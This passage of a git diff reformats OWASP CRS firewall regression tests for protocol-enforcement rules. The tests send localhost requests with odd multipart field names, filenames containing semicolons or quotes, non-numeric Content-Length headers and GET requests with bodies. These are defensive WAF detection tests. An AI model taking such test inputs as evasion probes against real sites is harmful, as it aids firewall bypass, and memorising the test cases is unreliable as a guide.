value: &[anoi]tilde;' stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - User-Agent: "OWASP CRS test agent" - Host: "localhost" - Content-Type: multipart/form-data; boundary=---------------------------265001916915724 - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - method: POST - port: 80 - uri: / - data: | - -----------------------------265001916915724 - Content-Disposition: form-data; name="ãñõĩÃÑÕĨzzz"; filename="test" - Content-Type: application/octet-stream + - input: + dest_addr: 127.0.0.1 + headers: + User-Agent: "OWASP CRS test agent" + Host: "localhost" + Content-Type: multipart/form-data; boundary=---------------------------265001916915724 + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + method: POST + port: 80 + uri: / + data: | + -----------------------------265001916915724 + Content-Disposition: form-data; name="ãñõĩÃÑÕĨzzz"; filename="test" + Content-Type: application/octet-stream helloworld -----------------------------265001916915724-- version: "HTTP/1.1" output: no_log_contains: id "920120" - - test_title: 920120-30 + - test_id: 30 desc: 'Attempted multipart/form-data bypass (920120). Negative test for HTML entities in values: &[cdelnrstz]caron;.' stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - User-Agent: "OWASP CRS test agent" - Host: "localhost" - Content-Type: multipart/form-data; boundary=---------------------------265001916915724 - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - method: POST - port: 80 - uri: / - data: | - -----------------------------265001916915724 - Content-Disposition: form-data; name="zzzčďěľňřšťžČĎĚĽŇŘŠŤŽzzz"; filename="test" - Content-Type: application/octet-stream + - input: + dest_addr: 127.0.0.1 + headers: + User-Agent: "OWASP CRS test agent" + Host: "localhost" + Content-Type: multipart/form-data; boundary=---------------------------265001916915724 + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + method: POST + port: 80 + uri: / + data: | + -----------------------------265001916915724 + Content-Disposition: form-data; name="zzzčďěľňřšťžČĎĚĽŇŘŠŤŽzzz"; filename="test" + Content-Type: application/octet-stream helloworld -----------------------------265001916915724-- version: "HTTP/1.1" output: no_log_contains: id "920120" - - test_title: 920120-31 + - test_id: 31 desc: 'Attempted multipart/form-data bypass (920120). Negative test for HTML entities at beginning of value: &[cdelnrstz]caron;' stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - User-Agent: "OWASP CRS test agent" - Host: "localhost" - Content-Type: multipart/form-data; boundary=---------------------------265001916915724 - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - method: POST - port: 80 - uri: / - data: | - -----------------------------265001916915724 - Content-Disposition: form-data; name="čďěľňřšťžČĎĚĽŇŘŠŤŽzzz"; filename="test" - Content-Type: application/octet-stream + - input: + dest_addr: 127.0.0.1 + headers: + User-Agent: "OWASP CRS test agent" + Host: "localhost" + Content-Type: multipart/form-data; boundary=---------------------------265001916915724 + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + method: POST + port: 80 + uri: / + data: | + -----------------------------265001916915724 + Content-Disposition: form-data; name="čďěľňřšťžČĎĚĽŇŘŠŤŽzzz"; filename="test" + Content-Type: application/octet-stream helloworld -----------------------------265001916915724-- version: "HTTP/1.1" output: no_log_contains: id "920120" - - test_title: 920120-32 + - test_id: 32 desc: 'Attempted multipart/form-data bypass (920120). Negative test for HTML entities in values: &[au]ring;.' stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - User-Agent: "OWASP CRS test agent" - Host: "localhost" - Content-Type: multipart/form-data; boundary=---------------------------265001916915724 - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - method: POST - port: 80 - uri: / - data: | - -----------------------------265001916915724 - Content-Disposition: form-data; name="zzzåůÅŮzzz"; filename="test" - Content-Type: application/octet-stream + - input: + dest_addr: 127.0.0.1 + headers: + User-Agent: "OWASP CRS test agent" + Host: "localhost" + Content-Type: multipart/form-data; boundary=---------------------------265001916915724 + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + method: POST + port: 80 + uri: / + data: | + -----------------------------265001916915724 + Content-Disposition: form-data; name="zzzåůÅŮzzz"; filename="test" + Content-Type: application/octet-stream helloworld -----------------------------265001916915724-- version: "HTTP/1.1" output: no_log_contains: id "920120" - - test_title: 920120-33 + - test_id: 33 desc: 'Attempted multipart/form-data bypass (920120). Negative test for HTML entities at beginning of value: &[au]ring;' stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - User-Agent: "OWASP CRS test agent" - Host: "localhost" - Content-Type: multipart/form-data; boundary=---------------------------265001916915724 - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - method: POST - port: 80 - uri: / - data: | - -----------------------------265001916915724 - Content-Disposition: form-data; name="åůÅŮzzz"; filename="test" - Content-Type: application/octet-stream + - input: + dest_addr: 127.0.0.1 + headers: + User-Agent: "OWASP CRS test agent" + Host: "localhost" + Content-Type: multipart/form-data; boundary=---------------------------265001916915724 + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + method: POST + port: 80 + uri: / + data: | + -----------------------------265001916915724 + Content-Disposition: form-data; name="åůÅŮzzz"; filename="test" + Content-Type: application/octet-stream helloworld -----------------------------265001916915724-- version: "HTTP/1.1" output: no_log_contains: id "920120" - - test_title: 920120-34 + - test_id: 34 desc: 'Attempted multipart/form-data bypass (920120). Negative test for HTML entities in values: ø,&, ,'.' stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - User-Agent: "OWASP CRS test agent" - Host: "localhost" - Content-Type: multipart/form-data; boundary=---------------------------265001916915724 - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - method: POST - port: 80 - uri: / - data: | - -----------------------------265001916915724 - Content-Disposition: form-data; name="zzzøØ&& 'zzz"; filename="test" - Content-Type: application/octet-stream + - input: + dest_addr: 127.0.0.1 + headers: + User-Agent: "OWASP CRS test agent" + Host: "localhost" + Content-Type: multipart/form-data; boundary=---------------------------265001916915724 + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + method: POST + port: 80 + uri: / + data: | + -----------------------------265001916915724 + Content-Disposition: form-data; name="zzzøØ&& 'zzz"; filename="test" + Content-Type: application/octet-stream helloworld -----------------------------265001916915724-- version: "HTTP/1.1" output: no_log_contains: id "920120" - - test_title: 920120-35 + - test_id: 35 desc: 'Attempted multipart/form-data bypass (920120). Negative test for HTML entities at beginning of value: &[au]ring;' stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - User-Agent: "OWASP CRS test agent" - Host: "localhost" - Content-Type: multipart/form-data; boundary=---------------------------265001916915724 - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - method: POST - port: 80 - uri: / - data: | - -----------------------------265001916915724 - Content-Disposition: form-data; name="øØ&& 'zzz"; filename="test" - Content-Type: application/octet-stream + - input: + dest_addr: 127.0.0.1 + headers: + User-Agent: "OWASP CRS test agent" + Host: "localhost" + Content-Type: multipart/form-data; boundary=---------------------------265001916915724 + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + method: POST + port: 80 + uri: / + data: | + -----------------------------265001916915724 + Content-Disposition: form-data; name="øØ&& 'zzz"; filename="test" + Content-Type: application/octet-stream helloworld -----------------------------265001916915724-- version: "HTTP/1.1" output: no_log_contains: id "920120" - - test_title: 920120-36 + - test_id: 36 desc: "Attempted multipart/form-data bypass (920120). Still match ; that aren't part of an HTML entity in FILES." stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - User-Agent: "OWASP CRS test agent" - Host: "localhost" - Content-Type: multipart/form-data; boundary=---------------------------265001916915724 - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - method: POST - port: 80 - uri: / - data: | - -----------------------------265001916915724 - Content-Disposition: form-data; name="&fi;zzz"; filename="test" - Content-Type: application/octet-stream + - input: + dest_addr: 127.0.0.1 + headers: + User-Agent: "OWASP CRS test agent" + Host: "localhost" + Content-Type: multipart/form-data; boundary=---------------------------265001916915724 + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + method: POST + port: 80 + uri: / + data: | + -----------------------------265001916915724 + Content-Disposition: form-data; name="&fi;zzz"; filename="test" + Content-Type: application/octet-stream helloworld -----------------------------265001916915724-- version: "HTTP/1.1" output: log_contains: id "920120" - - test_title: 920120-37 + - test_id: 37 desc: "Attempted multipart/form-data bypass (920120). Still match ; that aren't part of an HTML entity in FILES_NAMES." stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - User-Agent: "OWASP CRS test agent" - Host: "localhost" - Content-Type: multipart/form-data; boundary=---------------------------265001916915724 - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - method: POST - port: 80 - uri: / - data: | - -----------------------------265001916915724 - Content-Disposition: form-data; name="test"; filename="&fi;zzz" - Content-Type: application/octet-stream + - input: + dest_addr: 127.0.0.1 + headers: + User-Agent: "OWASP CRS test agent" + Host: "localhost" + Content-Type: multipart/form-data; boundary=---------------------------265001916915724 + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + method: POST + port: 80 + uri: / + data: | + -----------------------------265001916915724 + Content-Disposition: form-data; name="test"; filename="&fi;zzz" + Content-Type: application/octet-stream helloworld -----------------------------265001916915724-- version: "HTTP/1.1" output: log_contains: id "920120" - - test_title: 920120-38 + - test_id: 38 desc: "Attempted multipart/form-data bypass (920120). Don't match ; that are part of HTML entities in both FILES and FILES_NAMES." stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - User-Agent: "OWASP CRS test agent" - Host: "localhost" - Content-Type: multipart/form-data; boundary=---------------------------265001916915724 - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - method: POST - port: 80 - uri: / - data: | - -----------------------------265001916915724 - Content-Disposition: form-data; name="zzz&zzz"; filename="zzz&zzz" - Content-Type: application/octet-stream + - input: + dest_addr: 127.0.0.1 + headers: + User-Agent: "OWASP CRS test agent" + Host: "localhost" + Content-Type: multipart/form-data; boundary=---------------------------265001916915724 + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + method: POST + port: 80 + uri: / + data: | + -----------------------------265001916915724 + Content-Disposition: form-data; name="zzz&zzz"; filename="zzz&zzz" + Content-Type: application/octet-stream helloworld -----------------------------265001916915724-- version: "HTTP/1.1" output: no_log_contains: id "920120" - - test_title: 920120-39 + - test_id: 39 desc: "Attempted multipart/form-data bypass (920120). Allow empty fields." stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - User-Agent: "OWASP CRS test agent" - Host: "localhost" - Content-Type: multipart/form-data; boundary=---------------------------265001916915724 - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - method: POST - port: 80 - uri: / - data: | - -----------------------------265001916915724 - Content-Disposition: form-data; name=""; filename="" - Content-Type: application/octet-stream + - input: + dest_addr: 127.0.0.1 + headers: + User-Agent: "OWASP CRS test agent" + Host: "localhost" + Content-Type: multipart/form-data; boundary=---------------------------265001916915724 + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + method: POST + port: 80 + uri: / + data: | + -----------------------------265001916915724 + Content-Disposition: form-data; name=""; filename="" + Content-Type: application/octet-stream helloworld -----------------------------265001916915724-- diff --git a/tests/regression/tests/REQUEST-920-PROTOCOL-ENFORCEMENT/920121.yaml b/tests/regression/tests/REQUEST-920-PROTOCOL-ENFORCEMENT/920121.yaml index cc167e38f..8deb3dc62 100644 --- a/tests/regression/tests/REQUEST-920-PROTOCOL-ENFORCEMENT/920121.yaml +++ b/tests/regression/tests/REQUEST-920-PROTOCOL-ENFORCEMENT/920121.yaml @@ -1,122 +1,116 @@ --- meta: author: "Paul-Beckett, azurit" - enabled: true - name: "920121.yaml" description: "Tests to trigger rule 920121" +rule_id: 920121 tests: - - test_title: 920121-1 + - test_id: 1 stages: - - stage: - input: - dest_addr: "127.0.0.1" - method: "POST" - port: 80 - headers: - User-Agent: "OWASP CRS test agent" - Host: "localhost" - Content-Type: "multipart/form-data; boundary=--------397236876" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - uri: "/" - data: | - ----------397236876 - Content-Disposition: form-data; name="fileRap"; filename="te;st.txt" - Content-Type: text/plain + - input: + dest_addr: "127.0.0.1" + method: "POST" + port: 80 + headers: + User-Agent: "OWASP CRS test agent" + Host: "localhost" + Content-Type: "multipart/form-data; boundary=--------397236876" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + uri: "/" + data: | + ----------397236876 + Content-Disposition: form-data; name="fileRap"; filename="te;st.txt" + Content-Type: text/plain - Some-file-test-here - ----------397236876-- - version: "HTTP/1.1" - output: - log_contains: "id \"920121\"" - - test_title: 920121-2 + Some-file-test-here + ----------397236876-- + version: "HTTP/1.1" + output: + log_contains: "id \"920121\"" + - test_id: 2 stages: - - stage: - input: - dest_addr: "127.0.0.1" - method: "POST" - port: 80 - headers: - User-Agent: "OWASP CRS test agent" - Host: "localhost" - Content-Type: "multipart/form-data; boundary=--------397236876" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - uri: "/" - data: | - ----------397236876 - Content-Disposition: form-data; name="fileRap"; filename="te'st.txt" - Content-Type: text/plain + - input: + dest_addr: "127.0.0.1" + method: "POST" + port: 80 + headers: + User-Agent: "OWASP CRS test agent" + Host: "localhost" + Content-Type: "multipart/form-data; boundary=--------397236876" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + uri: "/" + data: | + ----------397236876 + Content-Disposition: form-data; name="fileRap"; filename="te'st.txt" + Content-Type: text/plain - Some-file-text-here - ----------397236876-- - version: "HTTP/1.1" - output: - log_contains: "id \"920121\"" - - test_title: 920121-3 + Some-file-text-here + ----------397236876-- + version: "HTTP/1.1" + output: + log_contains: "id \"920121\"" + - test_id: 3 stages: - - stage: - input: - dest_addr: "127.0.0.1" - method: "POST" - port: 80 - headers: - User-Agent: "OWASP CRS test agent" - Host: "localhost" - Content-Type: "multipart/form-data; boundary=--------397236876" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - uri: "/" - data: | - ----------397236876 - Content-Disposition: form-data; name="fileRap"; filename="te\"st.txt" - Content-Type: text/plain + - input: + dest_addr: "127.0.0.1" + method: "POST" + port: 80 + headers: + User-Agent: "OWASP CRS test agent" + Host: "localhost" + Content-Type: "multipart/form-data; boundary=--------397236876" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + uri: "/" + data: | + ----------397236876 + Content-Disposition: form-data; name="fileRap"; filename="te\"st.txt" + Content-Type: text/plain - Some-file-text-here - ----------397236876-- - version: "HTTP/1.1" - output: - log_contains: "id \"920121\"" - - test_title: 920121-4 + Some-file-text-here + ----------397236876-- + version: "HTTP/1.1" + output: + log_contains: "id \"920121\"" + - test_id: 4 stages: - - stage: - input: - dest_addr: "127.0.0.1" - method: "POST" - port: 80 - headers: - User-Agent: "OWASP CRS test agent" - Host: "localhost" - Content-Type: "multipart/form-data; boundary=--------397236876" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - uri: "/" - data: | - ----------397236876 - Content-Disposition: form-data; name="fileRap"; filename="te=st.txt" - Content-Type: text/plain + - input: + dest_addr: "127.0.0.1" + method: "POST" + port: 80 + headers: + User-Agent: "OWASP CRS test agent" + Host: "localhost" + Content-Type: "multipart/form-data; boundary=--------397236876" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + uri: "/" + data: | + ----------397236876 + Content-Disposition: form-data; name="fileRap"; filename="te=st.txt" + Content-Type: text/plain - Some-file-text-here - ----------397236876-- - version: "HTTP/1.1" - output: - log_contains: "id \"920121\"" - - test_title: 920121-5 + Some-file-text-here + ----------397236876-- + version: "HTTP/1.1" + output: + log_contains: "id \"920121\"" + - test_id: 5 stages: - - stage: - input: - dest_addr: "127.0.0.1" - method: "POST" - port: 80 - headers: - User-Agent: "OWASP CRS test agent" - Host: "localhost" - Content-Type: "multipart/form-data; boundary=--------397236876" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - uri: "/" - data: | - ----------397236876 - Content-Disposition: form-data; name="fileRap"; filename="test.txt" - Content-Type: text/plain + - input: + dest_addr: "127.0.0.1" + method: "POST" + port: 80 + headers: + User-Agent: "OWASP CRS test agent" + Host: "localhost" + Content-Type: "multipart/form-data; boundary=--------397236876" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + uri: "/" + data: | + ----------397236876 + Content-Disposition: form-data; name="fileRap"; filename="test.txt" + Content-Type: text/plain - Characters-shouldn't-trigger-rule-"-match-in-;-file - ----------397236876-- - version: "HTTP/1.1" - output: - no_log_contains: "id \"920121\"" + Characters-shouldn't-trigger-rule-"-match-in-;-file + ----------397236876-- + version: "HTTP/1.1" + output: + no_log_contains: "id \"920121\"" diff --git a/tests/regression/tests/REQUEST-920-PROTOCOL-ENFORCEMENT/920160.yaml b/tests/regression/tests/REQUEST-920-PROTOCOL-ENFORCEMENT/920160.yaml index 980d2e7fd..ac93c5db0 100644 --- a/tests/regression/tests/REQUEST-920-PROTOCOL-ENFORCEMENT/920160.yaml +++ b/tests/regression/tests/REQUEST-920-PROTOCOL-ENFORCEMENT/920160.yaml @@ -1,108 +1,102 @@ --- meta: author: "csanders-git, azurit" - enabled: true - name: "920160.yaml" description: "Tests to trigger rule 920160" +rule_id: 920160 tests: - # Non digit Content-Length without content-type - test_title: 920160-1 + test_id: 1 stages: - - stage: - input: - dest_addr: "127.0.0.1" - method: "GET" - port: 80 - headers: - User-Agent: "OWASP CRS test agent" - Host: "localhost" - Content-Length: "NotDigits" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - uri: "/" - version: "HTTP/1.1" - output: - status: 400 + - input: + dest_addr: "127.0.0.1" + method: "GET" + port: 80 + headers: + User-Agent: "OWASP CRS test agent" + Host: "localhost" + Content-Length: "NotDigits" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + uri: "/" + version: "HTTP/1.1" + output: + status: 400 - # Non digit content-length with content-type - test_title: 920160-2 + test_id: 2 stages: - - stage: - input: - dest_addr: "127.0.0.1" - method: "POST" - port: 80 - headers: - User-Agent: "OWASP CRS test agent" - Host: "localhost" - Content-Type: "application/x-www-form-urlencoded" - Content-Length: "NotDigits" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - uri: "/" - version: "HTTP/1.1" - output: - status: 400 + - input: + dest_addr: "127.0.0.1" + method: "POST" + port: 80 + headers: + User-Agent: "OWASP CRS test agent" + Host: "localhost" + Content-Type: "application/x-www-form-urlencoded" + Content-Length: "NotDigits" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + uri: "/" + version: "HTTP/1.1" + output: + status: 400 - # Mixed digit and non digit content length - test_title: 920160-3 + test_id: 3 stages: - - stage: - input: - dest_addr: "127.0.0.1" - method: "POST" - port: 80 - headers: - User-Agent: "OWASP CRS test agent" - Host: "localhost" - Content-Type: "application/x-www-form-urlencoded" - Content-Length: "123x" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - uri: "/" - version: "HTTP/1.1" - output: - status: 400 + - input: + dest_addr: "127.0.0.1" + method: "POST" + port: 80 + headers: + User-Agent: "OWASP CRS test agent" + Host: "localhost" + Content-Type: "application/x-www-form-urlencoded" + Content-Length: "123x" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + uri: "/" + version: "HTTP/1.1" + output: + status: 400 - # Test is based in httpbin.org, so backend returns 405 if you are not posting to /post # Apache auto corrects for this error now so the log should not contain anything - test_title: 920160-4 + test_id: 4 desc: Content-Length HTTP header is not numeric (920160) from old modsec regressions stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - Accept-Language: en-us,en;q=0.5 - Content-Length: '3' - Content-Type: application/x-www-form-urlencoded - Host: localhost - Keep-Alive: '300' - Proxy-Connection: keep-alive - User-Agent: "OWASP CRS test agent" - method: POST - port: 80 - uri: /post - version: HTTP/1.0 - data: abc - output: - status: 200 - no_log_contains: id "920160" - - test_title: 920160-5 + - input: + dest_addr: 127.0.0.1 + headers: + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + Accept-Language: en-us,en;q=0.5 + Content-Length: '3' + Content-Type: application/x-www-form-urlencoded + Host: localhost + Keep-Alive: '300' + Proxy-Connection: keep-alive + User-Agent: "OWASP CRS test agent" + method: POST + port: 80 + uri: /post + version: HTTP/1.0 + data: abc + output: + status: 200 + no_log_contains: id "920160" + - test_id: 5 desc: Content-Length HTTP header is not numeric (920160) from old modsec regressions stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - Accept-Language: en-us,en;q=0.5 - Content-Length: "3;" - Content-Type: application/x-www-form-urlencoded - Host: localhost - Keep-Alive: '300' - Proxy-Connection: keep-alive - User-Agent: "OWASP CRS test agent" - method: POST - port: 80 - uri: / - version: HTTP/1.0 - data: abc - output: - status: 400 - # log_contains: id "920160" + - input: + dest_addr: 127.0.0.1 + headers: + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + Accept-Language: en-us,en;q=0.5 + Content-Length: "3;" + Content-Type: application/x-www-form-urlencoded + Host: localhost + Keep-Alive: '300' + Proxy-Connection: keep-alive + User-Agent: "OWASP CRS test agent" + method: POST + port: 80 + uri: / + version: HTTP/1.0 + data: abc + output: + status: 400 + # log_contains: id "920160" diff --git a/tests/regression/tests/REQUEST-920-PROTOCOL-ENFORCEMENT/920170.yaml b/tests/regression/tests/REQUEST-920-PROTOCOL-ENFORCEMENT/920170.yaml index 6b28cdc35..a8b9a1090 100644 --- a/tests/regression/tests/REQUEST-920-PROTOCOL-ENFORCEMENT/920170.yaml +++ b/tests/regression/tests/REQUEST-920-PROTOCOL-ENFORCEMENT/920170.yaml @@ -1,122 +1,115 @@ --- meta: author: "csanders-git, azurit" - enabled: true - name: "920170.yaml" description: "A Selection of tests to trigger rule 920170" +rule_id: 920170 tests: - # POST Request with data (valid) - test_title: 920170-1 + test_id: 1 stages: - - stage: - input: - dest_addr: "127.0.0.1" - method: "POST" - port: 80 - headers: - User-Agent: "OWASP CRS test agent" - Host: "localhost" - Content-Type: "application/x-www-form-urlencoded" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - data: "hi=test" - uri: "/" - version: "HTTP/1.1" - output: - no_log_contains: "id \"920170\"" + - input: + dest_addr: "127.0.0.1" + method: "POST" + port: 80 + headers: + User-Agent: "OWASP CRS test agent" + Host: "localhost" + Content-Type: "application/x-www-form-urlencoded" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + data: "hi=test" + uri: "/" + version: "HTTP/1.1" + output: + no_log_contains: "id \"920170\"" - # GET request with data - test_title: 920170-2 + test_id: 2 stages: - - stage: - input: - dest_addr: "127.0.0.1" - method: "GET" - port: 80 - headers: - User-Agent: "OWASP CRS test agent" - Host: "localhost" - Content-Type: "application/x-www-form-urlencoded" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - data: "hi=test" - uri: "/" - version: "HTTP/1.1" - output: - log_contains: "id \"920170\"" + - input: + dest_addr: "127.0.0.1" + method: "GET" + port: 80 + headers: + User-Agent: "OWASP CRS test agent" + Host: "localhost" + Content-Type: "application/x-www-form-urlencoded" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + data: "hi=test" + uri: "/" + version: "HTTP/1.1" + output: + log_contains: "id \"920170\"" - # Head Request with data - test_title: 920170-3 + test_id: 3 stages: - - stage: - input: - dest_addr: "127.0.0.1" - method: "HEAD" - port: 80 - headers: - User-Agent: "OWASP CRS test agent" - Host: "localhost" - Content-Type: "application/x-www-form-urlencoded" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - data: "hi=test" - uri: "/" - version: "HTTP/1.1" - output: - log_contains: "id \"920170\"" + - input: + dest_addr: "127.0.0.1" + method: "HEAD" + port: 80 + headers: + User-Agent: "OWASP CRS test agent" + Host: "localhost" + Content-Type: "application/x-www-form-urlencoded" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + data: "hi=test" + uri: "/" + version: "HTTP/1.1" + output: + log_contains: "id \"920170\"" - # GET Request but content length is 0 and data is provided # Weird HTTP 1.0 support bug in Apache, without newline causes 408 - test_title: 920170-4 + test_id: 4 stages: - - stage: - input: - dest_addr: "127.0.0.1" - method: "GET" - port: 80 - headers: - User-Agent: "OWASP CRS test agent" - Host: "localhost" - Content-Type: "application/x-www-form-urlencoded" - Content-Length: "0" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - data: "hi=test\r\n" - stop_magic: true - uri: "/" - version: "HTTP/1.1" - output: - no_log_contains: "id \"920170\"" + - input: + dest_addr: "127.0.0.1" + method: "GET" + port: 80 + headers: + User-Agent: "OWASP CRS test agent" + Host: "localhost" + Content-Type: "application/x-www-form-urlencoded" + Content-Length: "0" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + data: "hi=test\r\n" + stop_magic: true + uri: "/" + version: "HTTP/1.1" + output: + no_log_contains: "id \"920170\"" - # GET request with content length 0 and no data. - test_title: 920170-5 + test_id: 5 stages: - - stage: - input: - dest_addr: "127.0.0.1" - method: "GET" - port: 80 - headers: - User-Agent: "OWASP CRS test agent" - Host: "localhost" - Content-Type: "application/x-www-form-urlencoded" - Content-Length: "0" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - data: "" - uri: "/" - version: "HTTP/1.1" - output: - no_log_contains: "id \"920170\"" - - test_title: 920170-6 + - input: + dest_addr: "127.0.0.1" + method: "GET" + port: 80 + headers: + User-Agent: "OWASP CRS test agent" + Host: "localhost" + Content-Type: "application/x-www-form-urlencoded" + Content-Length: "0" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + data: "" + uri: "/" + version: "HTTP/1.1" + output: + no_log_contains: "id \"920170\"" + - test_id: 6 desc: GET or HEAD Request with Body Content (920170) from old modsec regressions stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - Accept-Language: en-us,en;q=0.5 - Content-Type: application/x-www-form-urlencoded - Host: localhost - Keep-Alive: '300' - Proxy-Connection: keep-alive - User-Agent: "OWASP CRS test agent" - method: GET - port: 80 - uri: / - data: abc - version: "HTTP/1.1" - output: - log_contains: id "920170" + - input: + dest_addr: 127.0.0.1 + headers: + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + Accept-Language: en-us,en;q=0.5 + Content-Type: application/x-www-form-urlencoded + Host: localhost + Keep-Alive: '300' + Proxy-Connection: keep-alive + User-Agent: "OWASP CRS test agent" + method: GET + port: 80 + uri: / + data: abc + version: "HTTP/1.1" + output: + log_contains: id "920170" diff --git a/tests/regression/tests/REQUEST-920-PROTOCOL-ENFORCEMENT/920171.yaml b/tests/regression/tests/REQUEST-920-PROTOCOL-ENFORCEMENT/920171.yaml index 7d515219a..c66ae836a 